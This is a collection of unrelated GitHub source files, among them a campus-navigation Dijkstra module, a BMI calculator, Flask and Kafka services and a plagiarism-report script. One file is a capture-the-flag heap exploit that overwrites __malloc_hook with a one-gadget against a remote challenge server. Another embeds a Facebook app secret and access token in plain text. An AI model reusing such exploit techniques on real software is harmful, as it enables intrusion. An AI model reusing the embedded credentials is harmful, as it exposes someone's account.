elif self.nodes[curr].x == self.nodes[prev].x and self.nodes[curr].y < self.nodes[prev].y:\n directions.append('Back')\n else:\n directions.append(\"check em\")\n if(directions[-1]!='Straight'):\n directions_text = \"First turn {} and keep walking\".format(directions[-1])\n else:\n directions_text = \"Walk straight\"\n if(self.nodes[curr].name!=\"\"):\n directions_text+= \" till you reach \" + self.nodes[curr].name+\".\"\n else:\n directions_text+=\".\"\n\n else:\n x1 = self.nodes[path[i-2]].x # x1,y1 -> x2,y2\n y1 = self.nodes[path[i-2]].y\n x2 = self.nodes[path[i-1]].x\n y2 = self.nodes[path[i-1]].y\n x3 = self.nodes[path[i]].x\n y3 = self.nodes[path[i]].y\n if(x2>x1 and y1==y2):\n if(y3>y2 and x2==x3):\n directions.append('Left')\n elif(y2>y3 and x2==x3):\n directions.append('Right')\n elif(x3>x2 and y2==y3):\n directions.append('Straight')\n elif (x3 < x2 and y2 == y3):\n directions.append('Back')\n else:\n directions.append('check em x2x1')\n\n elif (x2 < x1 and y1 == y2):\n if (y3 > y2 and x2 == x3):\n directions.append('Right')\n elif (y2 > y3 and x2 == x3):\n directions.append('Left')\n elif (x3 > x2 and y2 == y3):\n directions.append('Back')\n elif (x3 < x2 and y2 == y3):\n directions.append('Straight')\n else:\n directions.append('check em x1x2')\n\n elif (x2 == x1 and y1 < y2):\n if (x3 > x2 and y2 == y3):\n directions.append('Right')\n elif (x2 > x3 and y2 == y3):\n directions.append('Left')\n elif (y3 < y2 and x2 == x3):\n directions.append('Back')\n elif (y3 > y2 and x2 == x3):\n directions.append('Straight')\n else:\n directions.append('check em y2y1')\n\n elif (x2 == x1 and y1 > y2):\n if (x3 > x2 and y2 == y3):\n directions.append('Left')\n elif (x2 > x3 and y2 == y3):\n directions.append('Right')\n elif (y3 < y2 and x2 == x3):\n directions.append('Straight')\n elif (y3 > y2 and x2 == x3):\n directions.append('Back')\n else:\n directions.append('check em y1y2')\n\n if(directions[-1]=='Straight'):\n if directions[-2]!='Straight':\n directions_text+=\" Continue straight.\"\n else:\n if(self.nodes[path[i-1]].name!=''):\n directions_text+=\" Now at {} turn {}.\".format(self.nodes[path[i-1]].name, directions[-1])\n else:\n directions_text+=\" Take the next \"+ directions[-1] + \".\"\n if i==len(path)-1:\n 
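# last node of the path: append the arrival message\n                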
directions_text+=" You have now arrived at "+self.nodes[dest].name+". "\n\n        return directions, directions_text\n\n\n    def dijkstra(self, src, dest):\n        V = self.V\n        dist = []\n        minHeap = Heap()\n        directions = []\n        parents = [-1]*(len(self.nodes))\n        path = []\n        path.append(src)\n        for v in range(V):\n            dist.append(sys.maxsize)\n            minHeap.array.append( minHeap.newMinHeapNode(v, dist[v]))\n            minHeap.pos.append(v)\n\n        minHeap.pos[src] = src\n        dist[src] = 0\n        minHeap.decreaseKey(src, dist[src])\n\n        minHeap.size = V\n\n        while minHeap.isEmpty() == False:\n            newHeapNode = minHeap.extractMin()\n\n            u = newHeapNode[0]\n\n            for pCrawl in self.graph[(u)]:\n                v = pCrawl[0]\n                if minHeap.isInMinHeap(v) and dist[u] != sys.maxsize and pCrawl[1] + dist[u] < dist[v]:\n                    dist[v] = pCrawl[1] + dist[u]\n                    parents[v] = u\n                    minHeap.decreaseKey(v, dist[v])\n        path = self.getSolution(dist, parents, src, dest)\n        directions, directions_text = self.getDirections(path, dest)\n        return round(dist[dest], 2), path, directions, directions_text\n\ndef getPath(destination,source):\n    src_number = map_node[source]\n    if destination:\n        dest_number = map_node[destination]\n        floor_navigation = ""\n        if dest_number == 23:\n            dest_number = 1\n            floor_navigation = " Take the stairs to reach the first floor. Turn left. Walk straight. You have now arrived at Director's Office."\n        elif dest_number == 11:\n            dest_number = 10\n            floor_navigation = " Take the stairs to reach the first floor. Turn left. You have now arrived at Library."\n        distance, path, directions, directions_text = graph.dijkstra(src_number, dest_number)\n        directions_text = directions_text + floor_navigation\n        return directions_text\n    return ""\n","repo_name":"VidhiRambhia/VJTI-Navigation","sub_path":"Alexa-Skill/src/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72546381927","text":"from tkinter import *\nw = Tk()\nw.geometry('480x380+500+100')\nw.title('BMI CALCULATOR')\nF1 = Frame(master =w,bg= "green")\nF1.place(x=10,y=20,width =100)\nF2 = Frame(w)\nF2.place(x=240,y=40)\nx = IntVar()\n\n\nL1= Label(F1, text = 'HEIGHT (cm):',font=('arial',14))\nL1.grid(row=0,column=0,padx=30,pady=15,sticky = 'w')\nE1 = Entry(master = F1, font =('arial',15), width = 12)\nE1.grid(row=1,column=0,padx=30,sticky ='w')\nL2= Label(master = F1, text = 'WEIGHT (kg):',font=('arial',14))\nL2.grid(row=2,column=0,padx=30,pady=15,sticky ='w')\nE2 = Entry(master =F1,font =('arial',15), width = 12)\nE2.grid(row=3,column=0,padx=30,sticky = 'w')\n\ndef R_click():\n    if x.get()==0:\n        L1.configure(text='HEIGHT (cm):')\n        L2.configure(text='WEIGHT (kg):')\n        a=E1.get()\n    else:\n        L1.configure(text='HEIGHT (Inches):')\n        L2.configure(text='WEIGHT (Pounds):')\n\nR1 = Radiobutton(master = F2,text = 'Metric',font=('arial',14),value =0,variable=x,command=R_click)\nR1.grid(row=0,column=0,pady=20,sticky='w')\nR2 = Radiobutton(master = F2,text = 'English',font=('arial',14),value=1,variable=x,command=R_click)\nR2.grid(row=1,column=0,sticky='w')\n\ndef B_click():\n    if x.get()==0:\n        a = float(E1.get())/100\n        b = float(E2.get())\n        BMI = round(b/(a*a),2)\n        L3.configure(text = 'BMI= '+ str(BMI))\n    else:\n        a = float(E1.get())\n        b = float(E2.get())\n        BMI = round(b/(a*a)*703,2)\n        L3.configure(text = 'BMI= '+ str(BMI))\nB=Button(w,text='CALCULATE',font =('arial',15),command =B_click)\nB.place(x=150,y=220)\nL3=Label(w,text ='BMI= ',font =('arial',15),fg 
='green')\nL3.place(x=180,y=280)\n\nw.mainloop()\n","repo_name":"Chi68P1/Lap_trinh_python","sub_path":"BT/BMI 2.0.py","file_name":"BMI 2.0.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41464893402","text":"import os\nimport json\nfrom flask import Flask, request, Response\nfrom tensorflow.keras.models import load_model\nfrom helpers.functions import read_and_prep_images, read_and_prep_image_from_url\n# from helpers.functions import read_and_prep_images, read_and_prep_images2\napp = Flask(__name__)\n\n\nPATH_MODEL = './models/jan_model_trainingv3.h5'\n# CLASSES = ['cellphone', 'digitalwatch', 'headphone',\n#            'laptop', 'speaker', 'tablet', 'television'] #v2\nCLASSES = ['cellphone', 'digitalwatch', 'headphone',\n           'laptop', 'television'] #v3\n\n# image_paths = ['test.png']\n# image_data = read_and_prep_images(image_paths)\n\nnew_model = load_model(PATH_MODEL)\n\n\n@app.route("/", methods=["GET"])\ndef test():\n    return Response("Proyecto Final Server", status=200)\n\n@app.route("/predict", methods=["POST"])\ndef healthcheck():\n    url = request.json['url']\n\n    image_data = read_and_prep_image_from_url(url)\n    predictions = new_model.predict(image_data)\n    most_accurrate_prediction = predictions.argmax(axis=1)[0]\n    \n    most_accurrate_prediction = CLASSES[most_accurrate_prediction]\n    response = {\n        'prediction': most_accurrate_prediction\n    }\n\n    return Response(json.dumps(response), status=200, mimetype='application/json')\n\n\nif __name__ == "__main__":\n    port = int(os.environ.get("PORT", 5000))\n    app.run(debug=True, host='0.0.0.0', port=port)\n\n    # app.run(threaded=True, port=5000)\n    # app.run(host="0.0.0.0")\n","repo_name":"ronal2s/server-picture-classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43018739628","text":"# --------------------------------------------------------------------\n# sqlhelperModel\n#\n# A singleton-style SqlHelper\n# A class-based sqlhelper built on a database connection pool, raw pymysql, a stack and threads\n# A per-thread stack of connections is maintained, so the with statement can open and close separate connections independently\n#\n# Other files can simply import the corresponding query methods, e.g.\n# in index.py:\n# from flask import current_app\n# db = current_app.DataBase\n# def index():\n#     res = db.fetchone("select * from %s", "AAA")\n#\n# Using the with statement\n# in index.py:\n# from flask import current_app\n# db = current_app.DataBase\n# def index():\n#     with db as curse:\n#         curse.execute("XXXXXXXXXXXX")\n# ----------------------------------------------------------------------\nimport pymysql\n# Usage for old versions (before 1.30)\n# from DBUtils.PooledDB import PooledDB\nfrom dbutils.pooled_db import PooledDB\nimport threading\n\n\nclass SqlHelper(object):\n    def __init__(self, HOST, PORT, USER, PASSWORD, DATABASE):\n        # Create a connection pool\n        self.POOL = PooledDB(\n            creator=pymysql,\n            maxconnections=None,\n            blocking=True,\n            ping=0,\n\n            # Regular database connection settings below\n            host=HOST,\n            port=PORT,\n            user=USER,\n            password=PASSWORD,\n            database=DATABASE,\n            charset='utf8'\n            # host='127.0.0.1',\n            # port=3306,\n            # user='root',\n            # password='',\n            # database='code_miaomu',\n            # charset='utf8'\n        )\n        self.local = threading.local()\n\n    def open(self):\n        conn = self.POOL.connection()\n        cursor = conn.cursor()\n        return conn, cursor\n\n    def close(self, cursor, conn):\n        cursor.close()\n        # Because a connection pool is used, this does not release the connection but returns it to the pool\n        conn.close()\n\n    # An example query method\n    # def fetchone(self, sql, *args):\n    #     result = self.cursor.fetchone(sql, args)\n    #     return result\n\n    # Context-manager methods used by the with statement\n    def 
__enter__(self):\n        conn, cursor = self.open()\n        # Fetch this thread's connection stack\n        rv = getattr(self.local, 'stack', None)\n        # If the stack is empty, initialize it with this connection\n        # Otherwise push the newly created connection onto it\n        if not rv:\n            self.local.stack = [(conn, cursor), ]\n        else:\n            # list.append() returns None, so append in place instead of reassigning\n            rv.append((conn, cursor))\n        return cursor\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        rv = getattr(self.local, 'stack', None)\n        # If the stack is empty, delete it since nothing is left\n        # Otherwise pop the most recent connection and close it\n        if not rv:\n            del self.local.stack\n\n        else:\n            conn, cursor = rv.pop()\n            self.close(cursor, conn)\n","repo_name":"WillOfTree/whiteZe","sub_path":"D_WEB框架/Flask/Flask_example/flask_web/models/SqlHelperModel.py","file_name":"SqlHelperModel.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2052282981","text":"import json\nfrom transformers import RobertaTokenizer\ntokenizer = RobertaTokenizer.from_pretrained("roberta-large")\nmask_id = tokenizer.mask_token_id\n\ndef create_blocks_from_plain_text(sentences, doc_idx, max_seq_length=256):\n    input_ids = tokenizer._batch_encode_plus(sentences)["input_ids"]\n    assert type(input_ids)==list\n\n    curr_input_ids_list = [[]]\n    for tokens in input_ids:\n\n        if mask_id in tokens:\n            # sometimes, the raw text contains [MASK]. in this case, we skip.\n            continue\n\n        if len(tokens) + len(curr_input_ids_list[-1]) <= max_seq_length:\n            curr_input_ids_list[-1] += tokens\n        elif len(tokens) <= max_seq_length:\n            curr_input_ids_list.append(tokens)\n        else:\n            while len(tokens) > max_seq_length:\n                th = max_seq_length-len(curr_input_ids_list[-1])\n                curr_input_ids_list[-1] += tokens[:th]\n                tokens = tokens[th:]\n                curr_input_ids_list.append([])\n            if len(tokens)>0:\n                curr_input_ids_list[-1] += tokens\n\n    output_lines = []\n    n_tokens = []\n    for block_idx, _input_ids in enumerate(curr_input_ids_list):\n        assert 0 old_mgroups.similarity:\n                parsed_comparisons[key] = new_mgroups\n\n    return parsed_comparisons\n\n\ndef all_elements_same(lst):\n    if len(lst) == 0:\n        return True\n    first_element = lst[0]\n    for element in lst:\n        if element != first_element:\n            return False\n    return True\n\n\ndef select_clusters(clusters, sim_threshold, grouped=False):\n    selected_clusters = []\n    for cluster in clusters:\n        avg_similarity = cluster['avg_similarity']\n        members_list = sorted(cluster['members'])\n\n        members = []\n        if not grouped:\n            for member in members_list:\n                sp_match = FNAME_REGEX.match(member)\n                assert sp_match is not None\n\n                gid = int(sp_match.group(1))\n                nsub = int(sp_match.group(2))\n                score = float(sp_match.group(3))\n\n                members.append((gid, score, nsub, member))\n        else:\n            members = [int(m) for m in members_list]\n\n        # sort by gid, then score and nsub (single subs) or \n        # sort by group\n        members.sort()\n\n        if avg_similarity >= sim_threshold:\n            new_cluster = copy.copy(cluster)\n            # if we are considering single subs, exclude the case where all\n            # the subs come from the same group.\n            if not grouped and \\\n               not all_elements_same([m[0] for m in members]):\n\n                new_cluster['groups'] = sorted(set([m[0] for m in members]))\n                selected_clusters.append(new_cluster)\n\n            if grouped:\n                new_cluster['groups'] = members\n                selected_clusters.append(new_cluster)\n\n    return selected_clusters\n\n\n# parse CLI args with argparse\ndef cli_args():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('JPLAG_LOG',\n                        type=PathType(exists=True, type='file'),\n                        help='Jplag log file.')\n    parser.add_argument('JPLAG_RESULTS',\n                        type=PathType(exists=True, type='file'),\n                        help='Jplag results in zip 
format.')\n    parser.add_argument('-g', '--grouped',\n                        action='store_true',\n                        help="Submissions are analyzed as groups.")\n    parser.add_argument('-o', '--output',\n                        type=pathlib.Path,\n                        default=None,\n                        help="Base name for report files "\n                             "[default: JPLAG_LOG].")\n    parser.add_argument('-s', '--similarity',\n                        type=float,\n                        default=None,\n                        help="Similarity threshold [default: 0.33].")\n\n    args = parser.parse_args()\n\n    return args\n\n\nif __name__ == '__main__':\n    args = cli_args()\n\n    with args.JPLAG_LOG.open('r') as logfp:\n        log_data = [line.strip() for line in logfp.readlines()]\n\n    comparisons = extract_comparisons(args.JPLAG_RESULTS,\n                                      grouped=args.grouped)\n    sorted_comparisons = [(k, v['similarity']) for k, v\n                          in sorted(comparisons.items(),\n                                    key=lambda item: item[1]['similarity'],\n                                    reverse=True\n                                    )\n                          ]\n    max_similarity = select_max_similarity_between_groups(sorted_comparisons,\n                                                          args.grouped)\n    max_similarity_sorted = [group for group\n                             in sorted(max_similarity.items(),\n                                       key=lambda item: item[1].similarity,\n                                       reverse=True\n                                       )\n                             ]\n\n    if args.similarity:\n        selected_groups = [group for key, group in max_similarity_sorted\n                           if group.similarity > args.similarity]\n    else:\n        selected_groups = [group for key, group in max_similarity_sorted[:10]]\n\n    comp_output_file = None\n    if args.output:\n        comp_output_file = args.output.with_name(\n            args.output.stem + '_report.csv'\n        )\n    else:\n        comp_output_file = args.JPLAG_LOG.with_name(\n            args.JPLAG_LOG.stem + '_report.csv'\n        )\n    with comp_output_file.open('w') as comp_outfp:\n        csvwriter = csv.writer(comp_outfp, delimiter='\t')\n\n        # write header\n        csvwriter.writerow(['gid1', 'gid2', 'similarity', 'filename'])\n\n        for group in selected_groups:\n            csvwriter.writerow(group)\n\n    nclusters = 0\n    clusters = []\n    # parse cluster data from JPLAG logs\n    for line in log_data:\n        if CLUSTERING_REGEX.match(line):\n\n            nclusters_match = NCLUSTERS_REGEX.match(line)\n            if nclusters_match:\n                nclusters = nclusters_match.group(1)\n            else:\n                cp_match = CLUSTERS_PARAM_REGEX.match(line)\n                if cp_match:\n                    # print("--", line)\n                    cl_strength = float(cp_match.group(1))\n                    cl_avg_similarity = float(cp_match.group(2))\n                    cl_members = set(cm.strip() for cm\n                                     in cp_match.group(3).strip().split(','))\n\n                    clusters.append({'strength': cl_strength,\n                                     'avg_similarity': cl_avg_similarity,\n                                     'members': cl_members\n                                     })\n\n    cluster_similarity = args.similarity \\\n        if args.similarity else CLUSTER_SIMILARITY_THRESHOLD\n    selected_clusters = select_clusters(clusters,\n                                        cluster_similarity,\n                                        args.grouped)\n\n    clusters_output_file = None\n    if args.output:\n        clusters_output_file = args.output.with_name(\n            args.output.stem + '_clusters_report.csv'\n        )\n    else:\n        clusters_output_file = args.JPLAG_LOG.with_name(\n            args.JPLAG_LOG.stem + '_clusters_report.csv'\n        )\n    with clusters_output_file.open('w') as clusters_outfp:\n        csvwriter = csv.writer(clusters_outfp, delimiter='\t')\n\n        # write header\n        if not args.grouped:\n            csvwriter.writerow(['groups', 'strength', 'avg_similarity',\n                                'members'])\n        else:\n            # cluster members are redundant for groups, they are the groups\n            # again\n            csvwriter.writerow(['groups', 'strength', 'avg_similarity'])\n\n        for cluster in selected_clusters:\n            groups = ','.join([str(el) for el in cluster['groups']])\n            strength = cluster['strength']\n            avg_similarity = cluster['avg_similarity']\n\n            if not args.grouped:\n                members = ','.join([str(el) for el in cluster['members']])\n                csvwriter.writerow([groups, strength, avg_similarity,\n                                    members])\n            else:\n                csvwriter.writerow([groups, 
strength, avg_similarity])\n\n    exit(0)\n","repo_name":"CristianCantoro/cms_check-plagiarism","sub_path":"scripts/report_jplag.py","file_name":"report_jplag.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"36453775689","text":"# shuffle, separate the data by mode, batch it, and return the data\nimport numpy as np\nimport torch\n\n\n## hyperparameters\nBatch_size = 64\n\n\nclass Dataloader:\n    def loader(self,dataset,mode,batch_size = None,shuffle = True):\n        ratio = 0.7\n        if shuffle:\n            np.random.shuffle(dataset.numpy())\n        dataset = torch.Tensor(dataset)\n\n        if mode == 'Train':\n            trainbatchdata = []\n            traindata = dataset[0:int(ratio*len(dataset))]\n            iterations = int(np.ceil(len(traindata)/batch_size))\n            for i in range(iterations-1):\n                trainbatchdata.append(traindata[i*batch_size:(i+1)*batch_size])\n            trainbatchdata.append(traindata[(iterations-1)*batch_size:])\n            return trainbatchdata\n        elif mode == 'Test':\n            testdata = dataset[int(ratio*len(dataset)):]\n            return testdata\n\n\n\n\n","repo_name":"realleaf/Project_RRF","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"6427713240","text":"#!/usr/bin/python\nfrom pwn import *\n\nHOST = '35.186.153.116'\nPORT = 7001\nchdir = '/MOUNT/contest/IJCTF2020-master/pwn/babyheap/'\nconfig = {\n    'elf': chdir + 'babyheap',\n    'libc': chdir + 'libc6_2.23-0ubuntu10_amd64.so',\n    'HOST': HOST,\n    'PORT': PORT,\n    }\n\nINPUT_PROMPT = None\n\ndef _malloc(r, sz, data):\n\tr.sendlineafter('>','1')\n\tr.sendlineafter('size:',str(sz))\n\tr.sendafter('data:',data)\n\ndef _free(r, idx):\n\tr.sendlineafter('>','2')\n\tr.sendlineafter('idx:',str(idx))\n\ndef _print(r, idx):\n\tr.sendlineafter('>','3')\n\tr.sendlineafter('idx:',str(idx))\n\ndef exploit(r):\n\t_malloc(r,0x3f0,"A"*0x3f0)\t# 0\n\t_malloc(r,0x30,"B"*0x30)\t# 1\n\t_malloc(r,0x60,"C"*0x60)\t# 2\n\t_malloc(r,0x3f0,"D"*0x3f0)\t# 3\n\t_malloc(r,0x60,"E"*0x60)\t# 4\n\t\n\t_free(r,2)\n\t_malloc(r,0x68,"c"*0x68) # 2\n\tfor i in range(0x65,0x5f,-1):\n\t\t_free(r,2)\n\t\t_malloc(r,0x68,"c"*i+p16(0x4b0)) # 2\n\t_free(r,0)\n\t_free(r,3) # Trigger overlapping chunks\n\n\t_malloc(r,0x3f0,"a"*0x3f0) # 0\n\t_print(r,1)\n\tr.recvuntil('data: ')\n\tleak = u64(r.recvn(6).ljust(8,'\\x00'))\n\tlibc.address = leak - 0x3c4b78\n\toneshot = libc.address + 0xf02a4\n\tlog.info("Leak Addr: {:#x}".format(leak))\n\tlog.info("Libc Addr: {:#x}".format(libc.address))\n\n\t_free(r,4) # fastbin[0x70] -> 4\n\t_free(r,2) # fastbin[0x70] -> 2 -> 4\n\n\t_malloc(r,0x50,"b"*0x40 + p64(libc.symbols['__malloc_hook']-0x23) + p64(0))\n\t\n\tfor i in range(0x38+6,0x38-1,-1):\n\t\t_free(r,1)\n\t\tdata = "b"*i + "\\x71"\n\t\tdata += "\\x00" * (0x50 - len(data))\n\t\t_malloc(r,0x50, data)\n\t\n\t_malloc(r,0x60,"d"*0x60) # fastbin[0x70] -> __malloc_hook\n\t_malloc(r,0x60,"\\x90"*0x13+p64(oneshot)+"\\x00"*(0x60-0x13-0x8))\n\t_malloc(r,0x20,"a"*0x20)\n\n\tr.interactive()\n\n# ptrs:0x55eadf91f040\nif __name__ == '__main__':\n    if "elf" in config.keys() and config["elf"]:\n        e = ELF(config["elf"])\n    if "libc" in config.keys() and config["libc"]:\n        libc = ELF(config["libc"])\n\n    context.log_level = 'debug'\n\n    if len(sys.argv) > 1:\n        r = remote(config["HOST"], config["PORT"])\n    else:\n        context.terminal=['tmux', 'splitw', '-h']\n
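        # preloading the bundled 2.23 libc keeps the local heap layout and the hard-coded offsets above (0x3c4b78, 0xf02a4) consistent with the remote target\n        r = process(e.path, 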
env={'LD_PRELOAD':config['libc']})\n \n gdb.attach(r, gdbscript='''\n \tb *(0xa24+0x137)\n \tb *(process+171)\n \t''')\n exploit(r)","repo_name":"r4k0nb4k0n/CTF-Writeups","sub_path":"2020/ijctf_2020/pwn/babyheap/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1585449665","text":"import re\nwith open('401k-symbols.txt') as f:\n lines = f.readlines() # list containing lines of file\n # columns = [] # To store column names\n #\n i = 1\n for line in lines:\n line = line.strip() # remove leading/trailing white spaces\n print('\\n\\n')\n print(line)\n if line:\n if i % 3 == 1:\n columns = [item.strip() for item in line.split('(')]\n print(columns[0])\n print(columns[1][0:-1])\n elif i % 3 == 0:\n columns = [item.strip() for item in line.split('Investments')]\n print(columns[0])\n print(dir(re.search('\\d+', columns[1])))\n\n # d = {} # dictionary to store file data (each line)\n # data = [item.strip() for item in line.split(',')]\n # for index, elem in enumerate(data):\n # d[columns[index]] = data[index]\n #\n # my_list.append(d) # append dictionary to list\n #\n i = i + 1\n# # pretty printing list of dictionaries\n# print(json.dumps(my_list, indent=4))","repo_name":"hungple/ibm-401k","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1240266235","text":"import sys\nimport json\nimport requests\nimport codecs\nimport os.path\n\nfrom datetime import datetime\nfrom dateutil import parser\n\nAPP_ID = \"1759548447703049\"\nAPP_SECRET = \"38762800fe27a48cf3464838ea9b60ba\"\nGRAPH_URL = \"https://graph.facebook.com/\"\nVERSION = \"v2.8/\"\nEVENT_LIMIT = 25\n\nTEMP_ACCESS_TOKEN = \"EAAZAATMwwwAkBAP3vbvWNfUCVcnxaF1ZBFbBwlZB0hGSKmrPV7aKQxAt3nKk9lBJR2qk7ZBCWa6dtmfZADwmEU165A8ns0tMZC9VO7K0lX6cMz7KjfDn34eT0KYhzLaqaSX0kbo9KztLwCysxZAbvIcIUcKYyDZBhqEZD\" #2 months\n\nPAGE_ID = \"19268387803\" #Attica\n\nquery = GRAPH_URL + VERSION + PAGE_ID + \"/?fields=fan_count,name,events.limit(\" + str(EVENT_LIMIT) + \"){id,name,start_time,end_time,is_canceled,attending},albums{name,id,photos.limit(2000){source}}&access_token=\" + TEMP_ACCESS_TOKEN\n\n#Go to https://developers.facebook.com/docs/graph-api/reference/page/ for list of fields\nrequest = requests.get(query)\ndata = json.loads(request.text)\n\n#save_path = \"C:/Users/Kevin-Notebook/Desktop\"\n#complete_name = os.path.join(save_path, \"nameoffilehere.txt\")\n\nevents = data['events']\nevents = events['data']\nalbums = data['albums']\nalbums = albums['data']\n#print(events)\n\nfor event in events:\n if event['is_canceled']:\n continue\n \n print(\"Event: \" + event['name'])\n print(\"Event ID: \" + event['id'])\n startTime = datetime.strptime(event['start_time'], \"%Y-%m-%dT%H:%M:%S+0800\") #%z for timezone doesnt work\n endTime = datetime.strptime(event['end_time'], \"%Y-%m-%dT%H:%M:%S+0800\")\n print(\"From \" + str(startTime) + \" to \" + str(endTime))\n\n if 'attending' in event:\n attendees = event['attending']\n attendees = attendees['data']\n\n for attendee in attendees:\n print(\"Name: \" + attendee['name'])\n print(\"FB ID: \" + attendee['id'])\nprint(\"Number of events: {}\".format(len(events)))\n\nfor album in albums:\n if album['name'] == \"Untitled Album\":\n continue\n \n print(\"Album name: \" + album['name'])\n print(\"Album ID: \" + album['id'])\n\n photos = 
album['photos']\n    photos = photos['data']\n    \n    for photo in photos:\n        print("Photo source: " + photo['source'])\n        print("Photo ID: " + photo['id'])\n    print("Number of photos: {}".format(len(photos)))\n    \nprint("Number of albums: {}".format(len(albums)))\n\n#file.close()\n\ndef getAttendeeLists(eventLimit):\n    query = GRAPH_URL + VERSION + PAGE_ID + "/?fields=fan_count,name,events.limit(" + str(eventLimit) + "){id,name,is_canceled,attending}&access_token=" + TEMP_ACCESS_TOKEN\n\n    request = requests.get(query)\n    data = json.loads(request.text)\n\n    events = data['events']\n    events = events['data']\n    eventDict = dict()\n\n    for event in events:\n        if event['is_canceled']:\n            continue\n\n        ev = (event['name'], event['id'])\n\n        attendeeList = []\n        if 'attending' in event:\n            attendees = event['attending']\n            attendees = attendees['data']\n\n            for attendee in attendees:\n                user = {'attendee_name': attendee['name'], 'attendee_id': attendee['id']}\n                attendeeList.append(user)\n\n        eventDict[ev] = attendeeList\n\n    return eventDict","repo_name":"KevinWoofr/event-scraper","sub_path":"Automation Scripts/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23082732566","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2017/10/10 9:29 AM\n# @Author  : Hou Rong\n# @Site    : \n# @File    : test_stop_3_for.py\n# @Software: PyCharm\n\ntry:\n    for i in range(10):\n        for j in range(10):\n            for k in range(10):\n                print(i, j, k)\n                if i == 1 and j == 1 and k == 1:\n                    raise StopIteration()\nexcept StopIteration:\n    print('It Stopped')\n","repo_name":"20113261/platform_service","sub_path":"test/test_stop_3_for.py","file_name":"test_stop_3_for.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"73074096807","text":"import math\n\ndef TwoSum(a,b):\n    x = a + b\n    z = x - a\n    y = (a-(x-z))+(b-z)\n    return x,y\n\ndef Split(a):\n    z = a * (134217728.0 + 1.0)\n    x = z - (z - a)\n    y = a - x\n    return x,y\n\n\ndef TwoPro(a,b):\n    x = a * b\n    ah,al = Split(a)\n    bh,bl = Split(b)\n    y = al * bl - (((x-ah*bh)-al*bh)-ah*bl)\n    return x,y\n","repo_name":"yixin-09/NPTaylor","sub_path":"src/eft.py","file_name":"eft.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10226079429","text":"from os import name\nimport connexion\nfrom connexion import NoContent\nimport json\nimport os.path\nfrom datetime import datetime\nimport datetime\nfrom pykafka import KafkaClient\nfrom pykafka.common import OffsetType\nfrom threading import Thread\nfrom flask_cors import CORS, cross_origin\nimport yaml\nimport logging\nimport logging.config\n\nif "TARGET_ENV" in os.environ and os.environ["TARGET_ENV"] == "test":\n    print("In Test Environment")\n    app_conf_file = "/config/app_conf.yml"\n    log_conf_file = "/config/log_conf.yml"\nelse:\n    print("In Dev Environment")\n    app_conf_file = "app_conf.yml"\n    log_conf_file = "log_conf.yml"\n\nwith open(app_conf_file, 'r') as f:\n    app_config = yaml.safe_load(f.read())\n\nwith open(log_conf_file, 'r') as f:\n    log_config = yaml.safe_load(f.read())\n    logging.config.dictConfig(log_config)\n\nlogger = logging.getLogger('basicLogger')\n\nlogger.info("App Conf File: %s" % app_conf_file)\nlogger.info("Log Conf File: %s" % log_conf_file)\n\n
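# note: get_update() and get_order() below are identical except for the event\n# type they count; a shared helper could fold them together, e.g. (sketch only,\n# 'get_event' is a hypothetical name, not part of this service):\n# def get_event(index, event_type):\n#     consumer = ...  # same reset-to-offset-0 simple consumer as below\n#     event_counter = 0\n#     for msg in consumer:\n#         event = json.loads(msg.value.decode('utf-8'))\n#         if event["type"] == event_type:\n#             if event_counter == index:\n#                 return event, 200\n#             event_counter += 1\n#     return {"message": "Not Found"}, 404\ndef get_update(index):\n    """ 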
Get Update in History """\n    hostname = "%s:%d" % (app_config["events"]["hostname"],\n                          app_config["events"]["port"])\n    client = KafkaClient(hosts=hostname)\n    topic = client.topics[str.encode(app_config["events"]["topic"])]\n    # Here we reset the offset on start so that we retrieve\n    # messages at the beginning of the message queue.\n    # To prevent the for loop from blocking, we set the timeout to\n    # 1000ms. There is a risk that this loop never stops if the\n    # index is large and messages are constantly being received!\n    consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n                                         consumer_timeout_ms=1000)\n    logger.info("Retrieving update at index %d" % index)\n    try:\n        event_counter = 0\n        for msg in consumer:\n            msg_str = msg.value.decode('utf-8')\n            msg = json.loads(msg_str)\n            # Find the event at the index you want and\n            # return code 200\n            # i.e., return event, 200\n            if msg["type"] == "update" and event_counter == index:\n                return msg, 200\n            elif msg["type"] == "update":\n                event_counter += 1\n    except:\n        logger.error("No more messages found")\n\n    logger.error("Could not find update at index %d" % index)\n    return { "message": "Not Found"}, 404\n\ndef get_order(index):\n    """ Get Order in History """\n    hostname = "%s:%d" % (app_config["events"]["hostname"],\n                          app_config["events"]["port"])\n    client = KafkaClient(hosts=hostname)\n    topic = client.topics[str.encode(app_config["events"]["topic"])]\n    # Here we reset the offset on start so that we retrieve\n    # 